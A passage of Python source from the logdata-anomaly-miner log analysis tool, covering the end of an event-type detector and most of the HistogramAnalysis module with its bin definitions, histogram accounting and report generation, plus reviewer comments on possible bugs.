"""Receives a parsed atom and keeps track of the event types and the values of the variables of 
them.""" self.log_total += 1 valid_log_atom = False if self.target_path_list: for path in self.target_path_list: if path in log_atom.parser_match.get_match_dictionary().keys(): valid_log_atom = True break if self.target_path_list and not valid_log_atom: self.current_index = -1 return False self.total_records += 1 # Get the current index, either from the combination of values of the paths of id_path_list, or the event type if self.id_path_list: # In case that id_path_list is set, use it to differentiate sequences by their id. # Otherwise, the empty tuple () is used as the only key of the current_sequences dict. id_tuple = () for id_path in self.id_path_list: id_match = log_atom.parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_id is True: # Insert placeholder for id_path that is not available id_tuple += ('',) else: # Omit log atom if one of the id paths is not found. return False else: if isinstance(id_match.match_object, bytes): id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (id_match.match_object,) # Check if only certain tuples are allowed and if the tuple is included. 
if self.allowed_id_tuples != [] and id_tuple not in self.allowed_id_tuples: self.current_index = -1 return False # Searches if the id_tuple has previously appeared current_index = -1 for event_index, var_key in enumerate(self.id_path_list_tuples): if id_tuple == var_key: current_index = event_index else: # Searches if the event type has previously appeared current_index = -1 for event_index in range(self.num_events): if self.longest_path[event_index] in log_atom.parser_match.get_match_dictionary() and set( log_atom.parser_match.get_match_dictionary()) == self.found_keys[event_index]: current_index = event_index # Initialize a new event type if the event type of the new line has not appeared if current_index == -1: current_index = self.num_events self.num_events += 1 self.found_keys.append(set(log_atom.parser_match.get_match_dictionary().keys())) # Initialize the list of the keys to the variables self.variable_key_list.append(list(self.found_keys[current_index])) # Delete the entries with value None or timestamps as values for var_index in range(len(self.variable_key_list[current_index]) - 1, -1, -1): if (type(log_atom.parser_match.get_match_dictionary()[self.variable_key_list[current_index][var_index]]).__name__ != 'MatchElement') or (log_atom.parser_match.get_match_dictionary()[self.variable_key_list[ current_index][var_index]].match_object is None): del self.variable_key_list[current_index][var_index] elif (self.target_path_list is not None) and self.variable_key_list[current_index][var_index] not in self.target_path_list: del self.variable_key_list[current_index][var_index] # Initialize the empty lists for the values and initialize the check_variables list for the variables if self.save_values: self.init_values(current_index) self.check_variables.append([True for _ in range(len(self.variable_key_list[current_index]))]) self.num_event_lines.append(0) if not self.id_path_list: # String of the longest found path self.longest_path.append('') # Number of forward 
slashes in the longest path tmp_int = 0 if self.target_path_list is None: for var_key in self.variable_key_list[current_index]: if var_key is not None: count = var_key.count('/') if count > tmp_int or (count == tmp_int and len(self.longest_path[current_index]) < len(var_key)): self.longest_path[current_index] = var_key tmp_int = count else: for found_key in list(self.found_keys[current_index]): if found_key is None: found_key = "" count = found_key.count('/') if count > tmp_int or (count == tmp_int and len(self.longest_path[current_index]) < len(found_key)): self.longest_path[current_index] = found_key tmp_int = count else: self.id_path_list_tuples.append(id_tuple) self.current_index = current_index if self.save_values: # Appends the values to the event type self.append_values(log_atom, current_index) self.num_event_lines[current_index] += 1 self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" tmp_list = [[]] for key in self.found_keys: tmp_list[0].append(list(key)) tmp_list.append(self.variable_key_list) tmp_list.append(self.values) tmp_list.append(self.longest_path) tmp_list.append(self.check_variables) tmp_list.append(self.num_event_lines) tmp_list.append(self.id_path_list_tuples) PersistenceUtil.store_json(self.persistence_file_name, tmp_list) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def add_following_modules(self, following_module): """Add the given Module to the following module list.""" 
self.following_modules.append(following_module) logging.getLogger(DEBUG_LOG_NAME).debug( "%s added following module %s.", self.__class__.__name__, following_module.__class__.__name__) def init_values(self, current_index): """Initialize the variable_key_list and the list for the values.""" # Initializes the value list if not self.values: self.values = [[[] for _ in range(len(self.variable_key_list[current_index]))]] else: self.values.append([[] for _ in range(len(self.variable_key_list[current_index]))]) def append_values(self, log_atom, current_index): """Add the values of the variables of the current line to self.values.""" for var_index, var_key in enumerate(self.variable_key_list[current_index]): # Skips the variable if check_variable is False, or if the var_key is not included in the match_dict if not self.check_variables[current_index][var_index]: continue if var_key not in log_atom.parser_match.get_match_dictionary(): self.values[current_index][var_index] = [] self.check_variables[current_index][var_index] = False continue raw_match_object = '' if isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_object, bytearray): raw_match_object = repr( bytes(log_atom.parser_match.get_match_dictionary()[var_key].match_object))[2:-1] elif isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_object, bytes): raw_match_object = repr(log_atom.parser_match.get_match_dictionary()[var_key].match_object)[2:-1] # Try to convert the values to floats and add them as values try: if raw_match_object != '': self.values[current_index][var_index].append(float(raw_match_object)) else: self.values[current_index][var_index].append( float(log_atom.parser_match.get_match_dictionary()[var_key].match_object)) # Add the strings as values except: # skipcq: FLK-E722 if isinstance(log_atom.parser_match.get_match_dictionary()[var_key].match_string, bytes): self.values[current_index][var_index].append( 
repr(log_atom.parser_match.get_match_dictionary()[var_key].match_string)[2:-1]) else: self.values[current_index][var_index].append(log_atom.parser_match.get_match_dictionary()[var_key].match_string) # Reduce the numbers of entries in the value list if len(self.variable_key_list[current_index]) > 0 and len([i for i in self.check_variables[current_index] if i]) > 0 and \ len(self.values[current_index][self.check_variables[current_index].index(True)]) > self.max_num_vals: for var_index in range(len(self.variable_key_list[current_index])): # skipcq: PTC-W0060 # Skips the variable if check_variable is False if not self.check_variables[current_index][var_index]: continue self.values[current_index][var_index] = self.values[current_index][var_index][-self.min_num_vals:] def get_event_type(self, event_index): """Return a string which includes information about the event type.""" if self.id_path_list: return_string = str(event_index) + '(' + str(self.id_path_list_tuples[event_index]) + ')' else: return_string = str(event_index) + '(' + str(self.longest_path[event_index]) + ')' return return_string HistogramAnalysis.py000066400000000000000000000700721437606560100347740ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", that calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating own subclasses from "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. 
* Example: The following example creates a HistogramAnalysis using only the property "/model/line/time", binned on per-hour basis and sending a report every week: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function moduloTimeBinDefinition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo histogramAnalysis=HistogramAnalysis.HistogramAnalysis( aminer_config, [('/model/line/time', moduloTimeBinDefinition)], 3600*24*7, # Reporting interval (weekly) anomaly_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atomFilter.addHandler(histogramAnalysis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
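"""
import time
import os
import abc
import logging
from datetime import datetime
from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface

# Optional dependency: p-values in histogram reports are only computed when scipy is importable. binomial_test is either None or a
# callable (k, n, p) -> two-sided p-value. scipy renamed binom_test to binomtest (which returns a result object instead of a plain
# float), so both spellings are supported; with the previous bare "except:" a missing binom_test attribute was swallowed silently and
# the p-values simply vanished from the reports.
binomial_test = None
try:
    from scipy import stats
    if hasattr(stats, 'binomtest'):
        def binomial_test(k, n, p):
            """Two-sided binomial test p-value for k successes in n trials with success probability p."""
            return stats.binomtest(k, n, p).pvalue
    else:
        binomial_test = stats.binom_test
except Exception:  # scipy is optional; any failure to import it just disables p-values.
    pass

# strftime pattern used for the "from ... till ..." header of the reports.
date_string = "%Y-%m-%d %H:%M:%S"


class BinDefinition(metaclass=abc.ABCMeta):
    """Abstract description of the bins of a histogram: how many there are, how they are named and which bin a value falls into."""

    @abc.abstractmethod
    def __init__(self):
        """Initiate the BinDefinition."""

    @abc.abstractmethod
    def has_outlier_bins(self):
        """
        Report if this binning works with outlier bins, that are bins for all values outside the normal binning range.
        If not, outliers are discarded. When true, the outlier bins are the first and last bin.
        """

    @abc.abstractmethod
    def get_bin_names(self):
        """Get the names of the bins for reporting, including the outlier bins if any."""

    @abc.abstractmethod
    def get_bin(self, value):
        """
        Get the number of the bin this value should belong to.
        @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the bin
        with outliers below limit, first normal bin is at index 1.
        """

    @abc.abstractmethod
    def get_bin_p_value(self, bin_pos, total_values, bin_values):
        """
        Calculate a p-Value, how likely the observed number of elements in this bin is.
        This method is used as an interface method, but it also returns a default value.
        @param bin_pos index of the bin to evaluate.
        @param total_values number of values the expected bin ratio refers to.
        @param bin_values number of values observed in this bin.
        @return the value or None when not applicable.
        """
        return None


class LinearNumericBinDefinition(BinDefinition):
    """Bins of equal width covering [lower_limit, lower_limit + bin_count * bin_size), optionally with two outlier bins around them."""

    def __init__(self, lower_limit, bin_size, bin_count, outlier_bins_flag=False):
        """
        Create the bin definition.
        @param lower_limit lower bound of the first regular bin.
        @param bin_size width of each regular bin.
        @param bin_count number of regular bins; also defines the expected ratio 1/bin_count per bin used for the p-value.
        @param outlier_bins_flag when True, values below lower_limit and at or above the last bin end get an extra bin each.
        """
        self.lower_limit = lower_limit
        self.bin_size = bin_size
        self.bin_count = bin_count
        self.outlier_bins_flag = outlier_bins_flag
        # Filled lazily by get_bin_names() so that histograms sharing this definition share one list.
        self.bin_names = None
        self.expected_bin_ratio = 1.0 / float(bin_count)

    def has_outlier_bins(self):
        """
        Report if this binning works with outlier bins, that are bins for all values outside the normal binning range.
        If not, outliers are discarded. When true, the outlier bins are the first and last bin.
        """
        return self.outlier_bins_flag

    def get_bin_names(self):
        """Get the names of the bins for reporting, including the outlier bins if any."""
        # Cache the names here so that multiple histograms using same BinDefinition do not use separate copies of the strings.
        if self.bin_names is not None:
            return self.bin_names
        self.bin_names = []
        if self.outlier_bins_flag:
            self.bin_names.append(f'...-{self.lower_limit}]')
        start = self.lower_limit
        for bin_pos in range(1, self.bin_count + 1):
            end = self.lower_limit + bin_pos * self.bin_size
            self.bin_names.append(f'[{start}-{end}]')
            start = end
        if self.outlier_bins_flag:
            self.bin_names.append(f'[{start}-...')
        return self.bin_names

    def get_bin(self, value):
        """
        Get the number of the bin this value should belong to.
        @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the bin
        with outliers below limit, first normal bin is at index 1.
        """
        if self.outlier_bins_flag:
            if value < self.lower_limit:
                return 0
            pos = int((value - self.lower_limit) / self.bin_size)
            if pos < self.bin_count:
                # Shift by one because bin 0 is the lower outlier bin.
                return pos + 1
            return self.bin_count + 1
        if value < self.lower_limit:
            return None
        pos = int((value - self.lower_limit) / self.bin_size)
        if pos < self.bin_count:
            return pos
        return None

    def get_bin_p_value(self, bin_pos, total_values, bin_values):
        """
        Calculate a p-Value, how likely the observed number of elements in this bin is.
        The test assumes every regular bin is equally likely (expected_bin_ratio); outlier bins are not evaluated.
        @return the value or None when not applicable (scipy missing or bin_pos is an outlier bin).
        """
        if binomial_test is None:
            return None
        if self.outlier_bins_flag and (bin_pos == 0 or bin_pos > self.bin_count):
            return None
        return binomial_test(bin_values, total_values, self.expected_bin_ratio)


class ModuloTimeBinDefinition(LinearNumericBinDefinition):
    """Linear bins applied to (value % modulo_value) / time_unit, e.g. the hour of the day of a timestamp."""

    def __init__(self, modulo_value, time_unit, lower_limit, bin_size, bin_count, outlier_bins_flag=False):
        """
        Create the bin definition.
        @param modulo_value period in the value's unit, e.g. 3600*24 for one day in seconds.
        @param time_unit divisor applied to the remainder to get to the reporting unit, e.g. 3600 for hours.
        The remaining parameters are passed to LinearNumericBinDefinition and refer to the reporting unit.
        """
        super().__init__(lower_limit, bin_size, bin_count, outlier_bins_flag)
        self.modulo_value = modulo_value
        self.time_unit = time_unit

    def get_bin(self, value):
        """
        Get the number of the bin this value should belong to.
        @return the bin number or None if the value is an outlier and outlier bins were not requested. With outliers, bin 0 is the bin
        with outliers below limit, first normal bin is at index 1.
        """
        if value is None:
            value = 0
        # bytes/str values are mapped to an integer and binned directly, without the modulo/time_unit step.
        # NOTE(review): presumably this only keeps non-numeric values from crashing the binning; confirm whether these values are
        # expected here at all.
        if isinstance(value, bytes):
            return super().get_bin(int.from_bytes(value, 'big'))
        if isinstance(value, str):
            return super().get_bin(int.from_bytes(value.encode(), 'big'))
        time_value = (value % self.modulo_value) / self.time_unit
        return super().get_bin(time_value)


class HistogramData:
    """
    This class defines the properties of one histogram to create and performs the accounting and reporting.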
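When the Python scipy package is available, reports will also include probability score created using binomial testing.
    """

    def __init__(self, property_path, bin_definition):
        """
        Create the histogram data structures.
        @param property_path parser path whose values are counted.
        @param bin_definition a BinDefinition deciding which bin a value falls into.
        """
        self.property_path = property_path
        self.bin_definition = bin_definition
        self.bin_names = bin_definition.get_bin_names()
        # One counter per bin name; bin_names and bin_data always have the same length.
        self.bin_data = [0] * len(self.bin_names)
        self.has_outlier_bins_flag = bin_definition.has_outlier_bins()
        self.total_elements = 0
        # Number of values in regular (non-outlier) bins; only maintained when outlier bins exist.
        self.binned_elements = 0

    def add_value(self, value):
        """
        Add one value to the histogram.
        Values outside the binning range are discarded when the bin definition has no outlier bins (get_bin returns None for them);
        previously such a value raised a TypeError from indexing bin_data with None. Discarded values are not counted in total_elements
        either, so the ratios in to_string stay relative to the values that are actually in a bin.
        """
        bin_pos = self.bin_definition.get_bin(value)
        if bin_pos is None:
            return
        self.bin_data[bin_pos] += 1
        self.total_elements += 1
        # With outlier bins the first and the last bin hold the outliers.
        if self.has_outlier_bins_flag and bin_pos != 0 and bin_pos + 1 != len(self.bin_names):
            self.binned_elements += 1

    def reset(self):
        """Remove all values from this histogram."""
        self.total_elements = 0
        self.binned_elements = 0
        self.bin_data = [0] * len(self.bin_data)

    def clone(self):
        """
        Clone this object so that calls to add_value do not influence the old object anymore.
        This behavior is a mixture of shallow and deep copy.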
"""
        duplicate = HistogramData(self.property_path, self.bin_definition)
        # The bin names are shared (they are immutable strings); the counters are copied.
        duplicate.bin_names = self.bin_names
        duplicate.bin_data = list(self.bin_data)
        duplicate.total_elements = self.total_elements
        duplicate.binned_elements = self.binned_elements
        return duplicate

    def to_string(self, indent):
        """
        Get a string representation of this histogram: a header line followed by one line per non-empty bin.
        @param indent prefix put in front of every line.
        @return the multi-line text; lines are separated by '\n'.
        """
        lines = [f'{indent}Property "{self.property_path}" ({self.total_elements} elements):']
        total = float(self.total_elements)
        # The p-value is relative to the regular bins only when outlier bins exist.
        p_value_base = self.binned_elements if self.has_outlier_bins_flag else self.total_elements
        for bin_pos, count in enumerate(self.bin_data):
            if count == 0:
                continue
            ratio = float(count) / total
            p_value = self.bin_definition.get_bin_p_value(bin_pos, p_value_base, count)
            if p_value is None:
                lines.append(f'{indent}* {self.bin_names[bin_pos]}: {count:d} (ratio = {ratio:.2e})')
            else:
                lines.append(f'{indent}* {self.bin_names[bin_pos]}: {count:d} (ratio = {ratio:.2e}, p = {p_value:.2e})')
        return '\n'.join(lines)


class HistogramAnalysis(AtomHandlerInterface, TimeTriggeredComponentInterface):
    """This class creates a histogram for one or more properties extracted from a parsed atom."""

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, histogram_definitions, report_interval, anomaly_event_handlers, reset_after_report_flag=True,
                 persistence_id='Default', output_logline=True):
        """
        Initialize the analysis component.
        @param aminer_config configuration from analysis_context.
        @param histogram_definitions a list of tuples containing the target property path to analyze and the BinDefinition to apply.
        @param report_interval delay in seconds before re-reporting. The parameter is applied to the parsed record data time, not the system
        time. Hence, reports can be delayed when no data is received.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
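@param reset_after_report_flag reset the histogram data after reporting.
        @param persistence_id name of persistence file.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @raises Exception when a persistence file for this component already exists: persisted histogram data is neither read nor merged.
        """
        # avoid "defined outside init" issue
        self.next_persist_time, self.log_success, self.log_total = [None] * 3
        super().__init__(
            aminer_config=aminer_config, histogram_definitions=histogram_definitions, report_interval=report_interval,
            anomaly_event_handlers=anomaly_event_handlers, reset_after_report_flag=reset_after_report_flag, persistence_id=persistence_id,
            output_logline=output_logline
        )
        self.last_report_time = None
        # 0.0 makes the first atom open the reporting window instead of sending a report.
        self.next_report_time = 0.0
        self.histogram_data = [HistogramData(path, bin_definition) for path, bin_definition in histogram_definitions]
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            msg = 'No data reading, def merge yet'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source.
        Every configured property present in the parser match is added to its histogram; afterwards a report is sent when the atom's
        timestamp (system time when the atom carries none) lies beyond next_report_time.
        """
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        for data_item in self.histogram_data:
            match = match_dict.get(data_item.property_path, None)
            if match is None:
                continue
            self.log_success += 1
            data_item.add_value(match.match_object)

        timestamp = log_atom.get_timestamp()
        if timestamp is None:
            timestamp = time.time()
        if self.next_report_time < timestamp:
            if self.last_report_time is None:
                # First atom seen: open the reporting window, nothing to report yet.
                self.last_report_time = timestamp
                self.next_report_time = timestamp + self.report_interval
            else:
                self.send_report(log_atom, timestamp)

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.
        @return the number of seconds until the next check.
        """
        if self.next_persist_time is None:
            # NOTE(review): nothing in this class assigns next_persist_time a value other than None, so do_persist() is not reached
            # from here as far as visible; confirm whether the base class sets it.
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)

        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage. This component stores no state, so only a debug line is logged."""
        # The message used to carry a stray quote ("persisted data.'"); aligned with the other components.
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def send_report(self, log_atom, timestamp):
        """
        Send a report to the event handlers and start the next reporting period.
        @param log_atom the atom that triggered the report; passed through to the handlers.
        @param timestamp end of the reported period; becomes last_report_time afterwards.
        """
        report_str = 'Histogram report '
        if self.last_report_time is not None:
            report_str += f'from {datetime.fromtimestamp(self.last_report_time).strftime(date_string)} '
        report_str += f'till {datetime.fromtimestamp(timestamp).strftime(date_string)}'
        analysis_component = {'AffectedLogAtomPaths': [data_item.property_path for data_item in self.histogram_data]}
        res = []
        h = []
        for data_item in self.histogram_data:
            d = {
                'TotalElements': data_item.total_elements, 'BinnedElements': data_item.binned_elements,
                'HasOutlierBinsFlag': data_item.has_outlier_bins_flag,
                # bin_names and bin_data have the same length (HistogramData.__init__ and clone keep them aligned).
                'Bins': dict(zip(data_item.bin_names, data_item.bin_data))}
            if self.output_logline:
                bin_definition = {
                    'Type': str(data_item.bin_definition.__class__.__name__), 'LowerLimit': data_item.bin_definition.lower_limit,
                    'BinSize': data_item.bin_definition.bin_size, 'BinCount': data_item.bin_definition.bin_count,
                    'OutlierBinsFlag': data_item.bin_definition.outlier_bins_flag, 'BinNames': data_item.bin_definition.bin_names,
                    'ExpectedBinRatio': data_item.bin_definition.expected_bin_ratio}
                if isinstance(data_item.bin_definition, ModuloTimeBinDefinition):
                    bin_definition['ModuloValue'] = data_item.bin_definition.modulo_value
                    bin_definition['TimeUnit'] = data_item.bin_definition.time_unit
                d['BinDefinition'] = bin_definition
            d['PropertyPath'] = data_item.property_path
            for line in data_item.to_string(' ').split('\n'):
                report_str += os.linesep + line
            # One (empty) log line slot per counted element; res[0] receives the textual report below.
            res += [''] * data_item.total_elements
            h.append(d)
        analysis_component['HistogramData'] = h
        analysis_component['ReportInterval'] = self.report_interval
        analysis_component['ResetAfterReportFlag'] = self.reset_after_report_flag
        event_data = {'AnalysisComponent': analysis_component}
        if len(res) > 0:
            res[0] = report_str
        for listener in self.anomaly_event_handlers:
            listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Histogram report', res, event_data, log_atom, self)
        if self.reset_after_report_flag:
            for data_item in self.histogram_data:
                data_item.reset()
        self.last_report_time = timestamp
        self.next_report_time = timestamp + self.report_interval
        logging.getLogger(DEBUG_LOG_NAME).debug("%s sent report.", self.__class__.__name__)


class PathDependentHistogramAnalysis(AtomHandlerInterface, TimeTriggeredComponentInterface):
    """
    This class provides a histogram analysis for only one property but separate histograms for each group of correlated match paths.
    Assume there are two paths that include the requested property but they separate after the property was found on the path. Then
    objects of this class will produce 3 histograms: one for the common path part including all occurrences of the target property and
    one for each separate subpath, counting only those property values where the specific subpath was followed.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, target_path, bin_definition, report_interval, anomaly_event_handlers, reset_after_report_flag=True,
                 persistence_id='Default', output_logline=True):
        """
        Initialize the analysis component.
        @param aminer_config configuration from analysis_context.
        @param target_path the path to be analyzed in the parser match of the log atom.
        @param bin_definition the bin definition (LinearNumericBinDefinition, ModuloTimeBinDefinition) to be used.
        @param report_interval delay in seconds before re-reporting.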
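The parameter is applied to the parsed record data time, not the system time. Hence, reports can be delayed when no data is received.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param reset_after_report_flag reset the histogram data after reporting.
        @param persistence_id name of persistence file.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @raises Exception when a persistence file for this component already exists: persisted histogram data is neither read nor merged.
        """
        # avoid "defined outside init" issue
        self.next_persist_time, self.log_success, self.log_total = [None] * 3
        super().__init__(
            aminer_config=aminer_config, target_path=target_path, bin_definition=bin_definition, report_interval=report_interval,
            anomaly_event_handlers=anomaly_event_handlers, reset_after_report_flag=reset_after_report_flag, persistence_id=persistence_id,
            output_logline=output_logline
        )
        self.last_report_time = None
        # 0.0 makes the first atom open the reporting window instead of sending a report.
        self.next_report_time = 0.0
        self.bin_definition = bin_definition
        # path -> [set of paths sharing the histogram, HistogramData, parser match of the last atom added]. All paths of one group map
        # to the same list object, so updating the list through one path is visible through the others.
        self.histogram_data = {}
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            msg = 'No data reading, def merge yet'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source.
        Atoms without the target path are ignored. Otherwise the set of all match paths of the atom is compared with the path groups
        seen so far: paths belonging to an existing group add the value to that group's histogram, groups whose paths are only
        partially present are split, and paths never seen before form a new group with a fresh histogram.
        """
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        match = match_dict.get(self.target_path, None)
        if match is None:
            return
        match_value = match.match_object

        all_path_set = set(match_dict.keys())
        unmapped_path = []
        missing_paths = set()
        while all_path_set:
            path = all_path_set.pop()
            histogram_mapping = self.histogram_data.get(path)
            if histogram_mapping is None:
                unmapped_path.append(path)
                continue
            # So the path is already mapped to one histogram. See if all paths to the given histogram are still in all_path_set. If not,
            # a split within the mapping is needed.
            # NOTE(review): all_path_set itself is not reduced by the group's other paths here, so those paths are popped again in
            # later iterations and see the same group; confirm that this is the intended flow.
            clone_set = all_path_set.copy()
            mapped_path = None
            for mapped_path in histogram_mapping[0]:
                try:
                    clone_set.remove(mapped_path)
                except KeyError:
                    # set.remove only raises KeyError; the previous bare "except:" also hid unrelated errors.
                    if mapped_path != path:
                        missing_paths.add(mapped_path)

            if not missing_paths:
                # Everything OK, just add the value to the mapping.
                # NOTE(review): match_value is re-read from mapped_path (the last path iterated above), not from target_path, and
                # the histogram gets a dynamic target_path attribute that send_report later reads; confirm both are intended.
                match = match_dict.get(mapped_path, None)
                match_value = match.match_object
                if isinstance(match.match_object, bytes):
                    match.match_object = match.match_object.decode(AminerConfig.ENCODING)
                histogram_mapping[1].target_path = mapped_path
                histogram_mapping[1].add_value(match_value)
                histogram_mapping[2] = log_atom.parser_match
            else:
                # We need to split the current set here. Keep the current statistics for all the missingPaths but clone the data for the
                # remaining paths.
                new_histogram = histogram_mapping[1].clone()
                match = match_dict.get(mapped_path, None)
                match_value = match.match_object
                histogram_mapping[1].target_path = mapped_path
                new_histogram.add_value(match_value)
                new_path_set = histogram_mapping[0] - missing_paths
                new_histogram_mapping = [new_path_set, new_histogram, log_atom.parser_match]
                for mapped_path in new_path_set:
                    self.histogram_data[mapped_path] = new_histogram_mapping
                histogram_mapping[0] = missing_paths
                missing_paths = set()

        if unmapped_path:
            # Paths never seen before form one new group; property_path ends up as the last path of the list.
            histogram = HistogramData(self.target_path, self.bin_definition)
            histogram.add_value(match_value)
            new_record = [set(unmapped_path), histogram, log_atom.parser_match]
            for path in unmapped_path:
                new_record[1].property_path = path
                self.histogram_data[path] = new_record

        timestamp = log_atom.get_timestamp()
        if timestamp is None:
            timestamp = time.time()
        if self.next_report_time < timestamp:
            if self.last_report_time is None:
                # First atom seen: open the reporting window, nothing to report yet.
                self.last_report_time = timestamp
                self.next_report_time = timestamp + self.report_interval
            else:
                self.send_report(log_atom, timestamp)
        self.log_success += 1

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.
        @return the number of seconds until the next check.
        """
        if self.next_persist_time is None:
            # NOTE(review): nothing in this class assigns next_persist_time a value other than None, so do_persist() is not reached
            # from here as far as visible; confirm whether the base class sets it.
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)

        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage. This component stores no state, so only a debug line is logged."""
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def send_report(self, log_atom, timestamp):
        """
        Send report to event handlers: one section per path group with the group's paths, an example match and the histogram text.
        @param log_atom the atom that triggered the report; passed through to the handlers.
        @param timestamp end of the reported period; becomes last_report_time afterwards.
        """
        report_str = 'Path histogram report '
        if self.last_report_time is not None:
            report_str += f'from {datetime.fromtimestamp(self.last_report_time).strftime(date_string)} '
        report_str += f'till {datetime.fromtimestamp(timestamp).strftime(date_string)}'
        all_path_set = set(self.histogram_data.keys())
        analysis_component = {'AffectedLogAtomPaths': list(all_path_set)}
        res = []
        h = []
        while all_path_set:
            d = {}
            path = all_path_set.pop()
            histogram_mapping = self.histogram_data.get(path)
            data_item = histogram_mapping[1]
            bins = {}
            i = 0
            while i < len(data_item.bin_names):
                bins[data_item.bin_names[i]] = data_item.bin_data[i]
                i = i + 1
            d['TotalElements'] = data_item.total_elements
            d['BinnedElements'] = data_item.binned_elements
            d['HasOutlierBinsFlag'] = data_item.has_outlier_bins_flag
            d['Bins'] = bins
            if self.output_logline:
                bin_definition = {
                    'Type': str(data_item.bin_definition.__class__.__name__), 'LowerLimit': data_item.bin_definition.lower_limit,
                    'BinSize': data_item.bin_definition.bin_size, 'BinCount': data_item.bin_definition.bin_count,
                    'OutlierBinsFlag': data_item.bin_definition.outlier_bins_flag, 'BinNames': data_item.bin_definition.bin_names,
                    'ExpectedBinRatio': data_item.bin_definition.expected_bin_ratio}
                if isinstance(data_item.bin_definition, ModuloTimeBinDefinition):
                    bin_definition['ModuloValue'] = data_item.bin_definition.modulo_value
                    bin_definition['TimeUnit'] = data_item.bin_definition.time_unit
                d['BinDefinition'] = bin_definition
            # NOTE(review): target_path is only set on the HistogramData once a path of its group was seen a second time (see
            # receive_atom); a group created and reported within the same period would raise AttributeError here — confirm.
            d['PropertyPath'] = data_item.target_path
            # skipcq: PYL-C0209
            report_str += os.linesep + 'Path values "%s":' % '", "'.join(histogram_mapping[0])
            # The example match string is decoded in place on the stored parser match.
            if isinstance(histogram_mapping[2].match_element.match_string, bytes):
                histogram_mapping[2].match_element.match_string = histogram_mapping[2].match_element.match_string.decode(
                    AminerConfig.ENCODING)
            report_str += os.linesep + f'Example: {histogram_mapping[2].match_element.match_string}'
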